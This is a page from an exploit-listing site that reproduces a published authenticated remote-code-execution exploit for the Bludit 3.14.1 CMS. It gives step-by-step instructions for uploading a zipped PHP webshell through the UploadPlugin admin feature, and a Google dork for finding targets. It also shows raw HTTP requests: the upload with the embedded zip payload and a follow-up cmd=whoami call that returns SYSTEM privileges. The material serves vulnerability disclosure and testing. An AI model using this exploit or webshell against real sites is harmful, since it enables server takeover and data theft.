Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040007

Below is a copy:

Bludit 3-14-1 Shell Upload
# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.bludit.com/
# Version : 3-14-1
# Tested on: windows 11 wampserver | Kali linux
# Category: WebApp
# Google Dork: intext:'2022 Powered by Bludit'
# Date: 8.12.2022
######## Description ########
#
#  Step 1 : Archive as a zip your webshell (example: payload.zip)
#  Step 2 : Login admin account and download 'UploadPlugin'
#  Step 3 : Go to UploadPlugin section
#  Step 4 : Upload your zip
#  Step 5 : target/bl-plugins/[your_payload]
#
######## Proof of Concept ########


==============> START REQUEST <========================================

POST /admin/plugin/uploadplugin HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264
Content-Length: 1820
Origin: https://036e-88-235-222-210.eu.ngrok.io
Dnt: 1
Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="tokenCSRF"

b6487f985b68f2ac2c2d79b4428dda44696d6231
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="pluginorthemes"

plugins
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="zip_file"; filename="a.zip"
Content-Type: application/zip

PK    eU               a/PK   fU)  
      a/a.phpV0}+La BVpXJ @V!rwl7$mQy<$93]=/.&nbsp;pZ+M5/B0>M[jB,tO.
4;e)9[Zd&amp;d<`+Ny
RLE(7}_3O'x>Appne&amp;k$jF@\@gxD'Q?vG7Zg
ju
\/THZujHkg,CRVj5y%}q(QK*";6zZgX'+%
j,Nf,_8[lOScsmIH*Sc?i)i&amp;x@.'<]zs^a)hBz0;f r0yUH"II\t{c~J ;dlhs%8N+}+arj.
vWSAO?nHO?jO Q+^ 
e8*"@2+`
kC57j'"m
 ho x ;czQ
[k-2~vCT#k2,USOSgK QI`:%F$A"t;buOMr4~eXm(s 6A3,l><Nq{s __~t6,OvbUg[;pqeJ
}v38# OsObhd>yMrSz)}eqQRrf}_D 0uv'?@ Oh'O8fD5[=b~PK?    eU             $       A    a/
          ,
 ,
j.
PK?   fU)  
    $            a/a.php
          e-
 C-
 bj.
PK             
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="submit"

Upload
-----------------------------308003478615795926433430552264--


==============> END REQUEST <========================================

## WEB SHELL UPLOADED!

==============> START RESPONSE <========================================

HTTP/2 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:01:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4
Pragma: no-cache
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: Bludit
.
.
.
.

==============> END RESPONSE <========================================

# REQUEST THE WEB SHELL

==============> START REQUEST <========================================

GET /bl-plugins/a/a.php?cmd=whoami HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

==============> END REQUEST <========================================

==============> START RESPONSE <========================================

HTTP/2 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:13:14 GMT
Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: PHP/7.4.26
Content-Length: 32

<pre>nt authority\system
</pre>

==============> END RESPONSE <========================================

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.